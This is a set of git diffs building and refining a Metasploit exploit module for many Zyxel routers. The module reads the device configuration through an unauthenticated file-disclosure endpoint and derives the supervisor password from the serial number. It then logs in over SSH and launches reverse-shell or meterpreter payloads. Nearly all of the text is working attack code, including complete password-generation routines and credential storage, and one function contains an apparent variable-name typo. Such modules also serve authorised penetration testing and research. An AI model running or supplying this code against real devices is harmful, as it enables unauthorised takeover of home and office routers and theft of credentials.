-    print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
+    print_status("Hardware:#{config['hardware']} Firmware:#{config['software']} Serial:#{config['serial']}")
     if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
       fail_with(Failure::NotVulnerable, 'Device serial, supervisor user, SSH port or SSH WAN access/service status not found.')
     end

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -275,8 +275,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # SerialNumMethod3
     hash_pwd['method3'] = serial_num_method3(serial)
 
-    print_status("decrypted password SerialNumMethod3: #{hash_pwd['method3']}")
-    print_status("decrypted password SerialNumMethod2: #{hash_pwd['method2']}")
+    print_status("Derived supervisor password using SerialNumMethod2: #{hash_pwd['method2']}")
+    print_status("Derived supervisor password using SerialNumMethod3: #{hash_pwd['method3']}")
     return hash_pwd
   end
 
@@ -307,20 +307,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_configuration(res)
     # Initiate the hash_config
     hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+
     # Parse the device configuration json file
     begin
       res_json = res.get_json_document
     rescue JSON::ParserError => e
-      print_error(Failure::Unknown, "Unable to parse the JSON response. Error: #{e}")
+      print_error("Unable to parse the JSON response. Error: #{e}")
       return hash_config
     end
-    if res_json.nil? || res_json.blank?
-      print_error(Failure::NotFound, 'No device configuration file found.')
+    if res_json.nil? || res_json.blank? || res_json.empty?
+      print_error('No device configuration file found.')
       return hash_config
     end
     # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
     # Also grab hardware and software version including the serial number to crack weak AES encrypted password of user supervisor
-
     hash_config['hardware'] = res_json['DeviceInfo']['HardwareVersion'] if !res_json.dig('DeviceInfo', 'HardwareVersion').nil?
     hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
     hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
@@ -343,13 +343,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    print_status("Executing #{cmd}")
-    begin
-      Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
-    rescue Timeout::Error
-      # print_warning('Timed out while waiting for command to return')
-      @timeout = true
-    end
+    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+  rescue Timeout::Error
+    @timeout = true
   end
 
   def do_login(ip, user, pass, ssh_port)
@@ -399,7 +395,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # check if all hash key/value pairs are populated
     print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
-    print_status("ssh_user: #{config['ssh_user']} ssh_port: #{config['ssh_port']} ssh_wan_access: #{config['ssh_wan_access']} ssh_service_enabled: #{config['ssh_service_enabled']}")
     if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
       return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
     end
@@ -425,7 +420,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # check if all hash key/value pairs are populated
     print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
-    print_status("ssh_user: #{config['ssh_user']} ssh_port: #{config['ssh_port']} ssh_wan_access: #{config['ssh_wan_access']} ssh_service_enabled: #{config['ssh_service_enabled']}")
     if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
       fail_with(Failure::NotVulnerable, 'Device serial, supervisor user, SSH port or SSH WAN access/service status not found.')
     end

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'socket'
+require 'digest/md5'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -19,16 +20,16 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Zyxel chained RCE using LFI and weak AES encryption',
+        'Name' => 'Zyxel chained RCE using LFI and weak password derivation algorithm',
         'Description' => %q{
           This module exploits multiple vulnerabilities in the zhttpd binary (/bin/zhttpd)
           and zcmd binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
           The remote code execution vulnerability can be exploited by chaining the local file disclosure
-          vulnerability in the zhttp binary that allows an unauthenticated attacker to read the entire configuration
+          vulnerability in the zhttpd binary that allows an unauthenticated attacker to read the entire configuration
           of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
           With this information disclosure, the attacker can determine if the router is reachable via ssh
-          and uses the second vulnerability in the` zcmd` binary to derive the `supervisor` password exploiting
-          a weak implementation of AES symmetric encrypting with static keys using the device serial number.
+          and use the second vulnerability in the `zcmd` binary to derive the `supervisor` password exploiting
+          a weak implementation of a password derivation algorithm using the device serial number.
 
           After exploitation, an attacker will be able to execute any command as user `supervisor`.
         },
@@ -101,12 +102,198 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options(
+      [
+        OptBool.new('STORE_CRED', [false, 'Store credentials into the database.', true])
+      ]
+    )
     register_advanced_options(
       [
         OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
+  end
+
+  # supervisor user password derivation functions (SerialNumMethod2 and 3) for Zyxel routers
+  # based on the reverse engineer analysis of Thomas Rinsma and Bogi Napoleon Wennerstrøm
+  # https://github.com/boginw/zyxel-vmg8825-keygen
+
+  def double_hash(input, size = 8)
+    # ROUND 1
+    # take the MD5 hash from the serial number SXXXXXXXXXXXX
+    # this returns a hash of 32 char bytes.
+    # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char
+    # store two char bytes in round1 and continue with next two char bytes from the hash.
+    md5_str_array = Digest::MD5.hexdigest(input).split(//)
+    round1_str_array = Array.new(32)
+    j = 0
+    until j == 32
+      if md5_str_array[j] == '0'
+        round1_str_array[j] = md5_str_array[j + 1]
+      else
+        round1_str_array[j] = md5_str_array[j]
+      end
+      round1_str_array[j + 1] = md5_str_array[j + 1]
+      j += 2
+    end
+    round1 = round1_str_array.join
+    # ROUND 2
+    # take the MD5 hash from the result of round1
+    # returns a hash of 32 char bytes.
+    # read md5 hash per two char bytes, check if first char byte = '0', then make first byte char == second byte char
+    # store two char bytes in round2 and continue with next two char bytes.
+    md5_str_array = Digest::MD5.hexdigest(round1).split(//)
+    round2_str_array = Array.new(32)
+    j = 0
+    until j == 32
+      if md5_str_array[j] == '0'
+        round2_str_array[j] = md5_str_array[j + 1]
+      else
+        round2_str_array[j] = md5_str_array[j]
+      end
+      round2_str_array[j + 1] = md5_str_array[j + 1]
+      j += 2
+    end
+    # ROUND 3
+    # take the result of round2 and pick the number (size) of char bytes starting with indice [0] and increased by 3
+    # to create the final password hash with defined number (size) of alphanumeric characters and return the final result
+    round3_str_array = Array.new(size)
+    for i in 0..(size - 1) do
+      round3_str_array[i] = round2_str_array[i * 3]
+    end
+    round3 = round3_str_array.join
+    return round3
+  end
+
+  def mod3_key_generator(seed)
+    # key generator function used in the SerialNumMethod3 pasword derivation function
+    round4_array = Array.new(16, 0)
+    found0s = 0
+    found1s = 0
+    found2s = 0
+
+    while (found0s == 0) || (found1s == 0) || (found2s == 0)
+      found0s = 0
+      found1s = 0
+      found2s = 0
+
+      power_of_2 = 1
+      seed += 1
+
+      for i in 0..9 do
+        round4_array[i] = (seed % (power_of_2 * 3) / power_of_2).floor
+        if (round4_array[i] == 1)
+          found1s += 1
+        elsif (round4_array[i]) == 2
+          found2s += 1
+        else
+          found0s += 1
+        end
+        power_of_2 = power_of_2 << 1
+      end
+    end
+    return seed, round4_array
+  end
+
+  def serial_num_method2(serial_number)
+    # SerialNumMethod2 password derivation function
+    pwd = double_hash(serial_number)
+    return pwd
+  end
+
+  def serial_num_method3(serial_number)
+    # SerialNumMethod3 password derivation function
+
+    # constant definitions
+    keystr1_byte_array = 'IO'.bytes.to_a
+    keystr2_byte_array = 'lo'.bytes.to_a
+    keystr3_byte_array = '10'.bytes.to_a
+    valstr_byte_array = '23456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz0123456789ABCDEF'.bytes.to_a
+    offset1 = 0x8
+    offset2 = 0x20
+
+    round3 = double_hash(serial_number, 10)
+    round3.upcase!
+    round3_byte_array = round3.bytes.to_a
+
+    md5_str = Digest::MD5.hexdigest(serial_number)
+    md5_str_array = md5_str.split(//)
+    offset = md5_str_array[2] + md5_str_array[3] + md5_str_array[4] + md5_str_array[5]
+
+    result = mod3_key_generator(offset.to_i(16))
+    offset = result[0]
+    round4 = result[1]
+
+    for i in 0..9 do
+      if round4[i] == 1
+        new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'A'.bytes.join.to_i
+        round3_byte_array[i] = new_val
+        for j in 0..1 do
+          next unless (round3_byte_array[i] == keystr1_byte_array[j])
+
+          index = offset1 + ((offset + j) % 0x18)
+          round3_byte_array[i] = valstr_byte_array[index]
+          break
+        end
+      elsif round4[i] == 2
+        new_val = (((round3_byte_array[i] % 0x1a) * 0x1000000) >> 0x18) + 'a'.bytes.join.to_i
+        round3_byte_array[i] = new_val
+        for j in 0..1 do
+          next unless (round3_byte_array[i] == keystr2_byte_array[j])
+
+          index = offset2 + ((offset + j) % 0x18)
+          round3_byte_array[i] = valstr_bytes_array[index]
+          break
+        end
+      else
+        new_val = (((round3_byte_array[i] % 10) * 0x1000000) >> 0x18) + '0'.bytes.join.to_i
+        round3_byte_array[i] = new_val
+        for j in 0..1 do
+          next unless (round3_byte_array[i] == keystr3_byte_array[j])
+
+          var = ((offset + j) >> 0x1f) >> 0x1d
+          index = ((offset + j + var) & 7) - var
+          round3_byte_array[i] = valstr_byte_array[index]
+          break
+        end
+      end
+    end
+    pwd = round3_byte_array.pack('C*')
+    return pwd
+  end
+
+  def crack_supervisor_pwd(serial)
+    # crack supervisor password using the device serial number
+    # there are two confirmed hashing functions that can derive the supervisor password from the serial number:
+    # SerialNumMethod2 and SerialNumMethod3
+    # both passwords candidates will be returned as hashes
+
+    hash_pwd = { 'method2' => nil, 'method3' => nil }
+    # SerialNumMethod2
+    hash_pwd['method2'] = serial_num_method2(serial)
+    # SerialNumMethod3
+    hash_pwd['method3'] = serial_num_method3(serial)
+
+    print_status("decrypted password SerialNumMethod3: #{hash_pwd['method3']}")
+    print_status("decrypted password SerialNumMethod2: #{hash_pwd['method2']}")
+    return hash_pwd
+  end
+
+  def report_creds(user, pwd)
+    credential_data = {
+      module_fullname: fullname,
+      username: user,
+      private_data: pwd,
+      private_type: :password,
+      workspace_id: myworkspace_id,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_details)
+
+    cred_res = create_credential_and_login(credential_data)
+    unless cred_res.nil?
+      print_status("Credentials for user:#{user} are added to the database...")
+    end
   end
 
   def get_configuration
@@ -138,53 +325,21 @@ class MetasploitModule < Msf::Exploit::Remote
     hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
     hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
 
-    if !res_json.dig('X_ZYXEL_LoginCfg', 'LogGp').nil?
-      res_json['X_ZYXEL_LoginCfg']['LogGp'].map do |login|
-        if !login['Account'].nil? && hash_config['ssh_user'] != 'supervisor'
-          login['Account'].map do |account|
-            if account['Username'] == 'supervisor'
-              hash_config['ssh_user'] = account['Username']
-              break
-            end
-          end
-        else
-          break
-        end
-      end
+    login_cfg = res_json.dig('X_ZYXEL_LoginCfg', 'LogGp')
+    unless login_cfg.nil?
+      hash_config['ssh_user'] = login_cfg.select { |l| l['Account']&.select { |a| a['Username'] == 'supervisor' } }.blank? ? nil : 'supervisor'
     end
-    if !res_json.dig('X_ZYXEL_RemoteManagement', 'Service').nil?
-      res_json['X_ZYXEL_RemoteManagement']['Service'].map do |service|
-        next unless service['Name'] == 'SSH'
 
+    remote_service = res_json.dig('X_ZYXEL_RemoteManagement', 'Service')
+    unless remote_service.nil?
+      service = remote_service.select { |s| s['Name'] == 'SSH' }.first
+      if !service.blank? && (service['Name'] == 'SSH')
         hash_config['ssh_port'] = service['Port']
         hash_config['ssh_wan_access'] = service['Mode']
         hash_config['ssh_service_enabled'] = service['Enable']
-        break
       end
     end
     return hash_config
-  end
-
-  def crack_supervisor_pwd(serial)
-    # crack supervisor password by exploiting a weak implementation of AES symmetric encrypting with static keys using the device serial number
-    # using system call for now. TODO: rewrite functions in native ruby
-    # there are two confirmed hashing functions that can  derive the supervisor password from the serial number, called SerialNumMethod2 and SerialNumMethod3
-    # both passwords will be returned in a password hash
-
-    hash_pwd = { 'method2' => nil, 'method3' => nil }
-    # SerialNumMethod2
-    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod2 #{serial}`
-    pwd = result.partition(':')
-    hash_pwd['method2'] = pwd.last.strip
-
-    # SerialNumMethod3
-    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod3 #{serial}`
-    pwd = result.partition(':')
-    hash_pwd['method3'] = pwd.last.strip
-
-    print_status("decrypted password SerialNumMethod3: #{hash_pwd['method3']}")
-    print_status("decrypted password SerialNumMethod2: #{hash_pwd['method2']}")
-    return hash_pwd
   end
 
   def execute_command(cmd, _opts = {})
@@ -249,13 +404,16 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
     end
 
-    # check if ssh_port is open, ssh service is enabled and accessible from the WAN side
-    if config['ssh_wan_access'] == 'LAN_WAN' && config['ssh_service_enabled'] && check_port(config['ssh_port'])
-      return CheckCode::Vulnerable
-    elsif !config['ssh_service_enabled']
-      return CheckCode::Safe('SSH service is NOT available.')
+    # check if ssh service is enabled
+    # if true then check ssh_port is open and ssh service is accessible from the WAN side
+    if config['ssh_service_enabled']
+      if config['ssh_wan_access'] == 'LAN_WAN' && check_port(config['ssh_port'])
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+      end
     else
-      return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+      return CheckCode::Safe('SSH service is NOT available.')
     end
   end
 
@@ -272,17 +430,29 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Device serial, supervisor user, SSH port or SSH WAN access/service status not found.')
     end
 
-    if config['ssh_wan_access'] == 'LAN_WAN' && config['ssh_service_enabled'] && check_port(config['ssh_port'])
-      print_status("SSH service is available and SSH Port #{config['ssh_port']} is open. Continue to login.")
-    elsif !config['ssh_service_enabled']
-      fail_with(Failure::NotVulnerable, 'SSH service is NOT available.')
+    # check if ssh service is enabled
+    # if true then check ssh_port is open and ssh service is accessible from the WAN side
+    if config['ssh_service_enabled']
+      if config['ssh_wan_access'] == 'LAN_WAN' && check_port(config['ssh_port'])
+        print_status("SSH service is available and SSH Port #{config['ssh_port']} is open. Continue to login.")
+      else
+        fail_with(Failure::Unreachable, "WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+      end
     else
-      fail_with(Failure::Unreachable, "WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+      fail_with(Failure::NotVulnerable, 'SSH service is NOT available.')
     end
 
+    # derive supervisor password candidates using password derivation method SerialNumMethod2 and SerialNumMethod3
     supervisor_pwd = crack_supervisor_pwd(config['serial'])
-    # try supervisor password generated by SerialNumMethod3 first, if it fails then try the password generated by SerialNumMethod2
-    if !do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method3'], config['ssh_port']) && !do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method2'], config['ssh_port'])
+
+    # try supervisor password derived by SerialNumMethod3 first, if it fails then try the password derived by SerialNumMethod2
+    if do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method3'], config['ssh_port'])
+      print_status('Authentication with derived supervisor password using Method3 is successful.')
+      report_creds(config['ssh_user'], supervisor_pwd['method3']) if datastore['STORE_CRED']
+    elsif do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method2'], config['ssh_port'])
+      print_status('Authentication with derived supervisor password using Method2 is successful.')
+      report_creds(config['ssh_user'], supervisor_pwd['method2']) if datastore['STORE_CRED']
+    else
       fail_with(Failure::NoAccess, 'Both supervisor password derivation methods failed to authenticate.')
     end
 

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -1,0 +1,299 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'socket'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  attr_accessor :ssh_socket
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel chained RCE using LFI and weak AES encryption',
+        'Description' => %q{
+          This module exploits multiple vulnerabilities in the zhttpd binary (/bin/zhttpd)
+          and zcmd binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
+          The remote code execution vulnerability can be exploited by chaining the local file disclosure
+          vulnerability in the zhttp binary that allows an unauthenticated attacker to read the entire configuration
+          of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
+          With this information disclosure, the attacker can determine if the router is reachable via ssh
+          and uses the second vulnerability in the` zcmd` binary to derive the `supervisor` password exploiting
+          a weak implementation of AES symmetric encrypting with static keys using the device serial number.
+
+          After exploitation, an attacker will be able to execute any command as user `supervisor`.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author of exploit chain and MSF module contributor
+          'SEC Consult Vulnerability Lab'
+        ],
+        'References' => [
+          ['URL', 'https://r.sec-consult.com/zyxsploit']
+        ],
+        'DisclosureDate' => '2022-02-01',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSBE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def get_configuration
+    # Get the device configuration by exploiting the LFI vulnerability
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')
+    })
+  end
+
+  def process_configuration(res)
+    # Initiate the hash_config
+    hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+    # Parse the device configuration json file
+    begin
+      res_json = res.get_json_document
+    rescue JSON::ParserError => e
+      print_error(Failure::Unknown, "Unable to parse the JSON response. Error: #{e}")
+      return hash_config
+    end
+    if res_json.nil? || res_json.blank?
+      print_error(Failure::NotFound, 'No device configuration file found.')
+      return hash_config
+    end
+    # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
+    # Also grab hardware and software version including the serial number to crack weak AES encrypted password of user supervisor
+
+    hash_config['hardware'] = res_json['DeviceInfo']['HardwareVersion'] if !res_json.dig('DeviceInfo', 'HardwareVersion').nil?
+    hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
+    hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
+
+    if !res_json.dig('X_ZYXEL_LoginCfg', 'LogGp').nil?
+      res_json['X_ZYXEL_LoginCfg']['LogGp'].map do |login|
+        if !login['Account'].nil? && hash_config['ssh_user'] != 'supervisor'
+          login['Account'].map do |account|
+            if account['Username'] == 'supervisor'
+              hash_config['ssh_user'] = account['Username']
+              break
+            end
+          end
+        else
+          break
+        end
+      end
+    end
+    if !res_json.dig('X_ZYXEL_RemoteManagement', 'Service').nil?
+      res_json['X_ZYXEL_RemoteManagement']['Service'].map do |service|
+        next unless service['Name'] == 'SSH'
+
+        hash_config['ssh_port'] = service['Port']
+        hash_config['ssh_wan_access'] = service['Mode']
+        hash_config['ssh_service_enabled'] = service['Enable']
+        break
+      end
+    end
+    return hash_config
+  end
+
+  def crack_supervisor_pwd(serial)
+    # crack supervisor password by exploiting a weak implementation of AES symmetric encrypting with static keys using the device serial number
+    # using system call for now. TODO: rewrite functions in native ruby
+    # there are two confirmed hashing functions that can  derive the supervisor password from the serial number, called SerialNumMethod2 and SerialNumMethod3
+    # both passwords will be returned in a password hash
+
+    hash_pwd = { 'method2' => nil, 'method3' => nil }
+    # SerialNumMethod2
+    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod2 #{serial}`
+    pwd = result.partition(':')
+    hash_pwd['method2'] = pwd.last.strip
+
+    # SerialNumMethod3
+    result = `python ~/zyxel_exploit/zyxel-vmg8825-keygen/main.py -f zcfgBeCommonGenKeyBySerialNumMethod3 #{serial}`
+    pwd = result.partition(':')
+    hash_pwd['method3'] = pwd.last.strip
+
+    print_status("decrypted password SerialNumMethod3: #{hash_pwd['method3']}")
+    print_status("decrypted password SerialNumMethod2: #{hash_pwd['method2']}")
+    return hash_pwd
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Executing #{cmd}")
+    begin
+      Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+    rescue Timeout::Error
+      # print_warning('Timed out while waiting for command to return')
+      @timeout = true
+    end
+  end
+
+  def do_login(ip, user, pass, ssh_port)
+    # create SSH session and login
+    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
+    opts = ssh_client_defaults.merge({
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: ssh_port,
+      password: pass
+    })
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def check_port(port)
+    # checks network port and return true if open and false if closed.
+    (sleep datastore['WfsDelay']) until begin
+      TCPSocket.open(datastore['RHOST'], port)
+    rescue StandardError
+      return false
+    end
+    return true
+  end
+
+  def check
+    res = get_configuration
+    return CheckCode::Safe if res.nil? || res.code != 200
+
+    config = process_configuration(res)
+
+    # check if all hash key/value pairs are populated
+    print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
+    print_status("ssh_user: #{config['ssh_user']} ssh_port: #{config['ssh_port']} ssh_wan_access: #{config['ssh_wan_access']} ssh_service_enabled: #{config['ssh_service_enabled']}")
+    if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
+      return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
+    end
+
+    # check if ssh_port is open, ssh service is enabled and accessible from the WAN side
+    if config['ssh_wan_access'] == 'LAN_WAN' && config['ssh_service_enabled'] && check_port(config['ssh_port'])
+      return CheckCode::Vulnerable
+    elsif !config['ssh_service_enabled']
+      return CheckCode::Safe('SSH service is NOT available.')
+    else
+      return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+    end
+  end
+
+  def exploit
+    res = get_configuration
+    fail_with(Failure::NotVulnerable) if res.nil? || res.code != 200
+
+    config = process_configuration(res)
+
+    # check if all hash key/value pairs are populated
+    print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
+    print_status("ssh_user: #{config['ssh_user']} ssh_port: #{config['ssh_port']} ssh_wan_access: #{config['ssh_wan_access']} ssh_service_enabled: #{config['ssh_service_enabled']}")
+    if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
+      fail_with(Failure::NotVulnerable, 'Device serial, supervisor user, SSH port or SSH WAN access/service status not found.')
+    end
+
+    if config['ssh_wan_access'] == 'LAN_WAN' && config['ssh_service_enabled'] && check_port(config['ssh_port'])
+      print_status("SSH service is available and SSH Port #{config['ssh_port']} is open. Continue to login.")
+    elsif !config['ssh_service_enabled']
+      fail_with(Failure::NotVulnerable, 'SSH service is NOT available.')
+    else
+      fail_with(Failure::Unreachable, "WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+    end
+
+    supervisor_pwd = crack_supervisor_pwd(config['serial'])
+    # try supervisor password generated by SerialNumMethod3 first, if it fails then try the password generated by SerialNumMethod2
+    if !do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method3'], config['ssh_port']) && !do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method2'], config['ssh_port'])
+      fail_with(Failure::NoAccess, 'Both supervisor password derivation methods failed to authenticate.')
+    end
+
+    if target.name == 'Interactive SSH'
+      handler(ssh_socket)
+      return
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager(linemax: 500)
+    end
+    @timeout ? ssh_socket.shutdown! : ssh_socket.close
+  end
+end

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -35,10 +35,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author of exploit chain and MSF module contributor
-          'SEC Consult Vulnerability Lab'
+          'SEC Consult Vulnerability Lab',
+          'Thomas Rinsma',
+          'Bogi Napoleon Wennerstrøm'
         ],
         'References' => [
-          ['URL', 'https://r.sec-consult.com/zyxsploit']
+          ['URL', 'https://r.sec-consult.com/zyxsploit'],
+          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/'],
+          ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],
+          ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],
+          ['URL', 'https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-chained-rce-using-lfi-and-weak-aes-encryption-no-cve']
         ],
         'DisclosureDate' => '2022-02-01',
         'Platform' => ['unix', 'linux'],
@@ -255,7 +261,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     res = get_configuration
-    fail_with(Failure::NotVulnerable) if res.nil? || res.code != 200
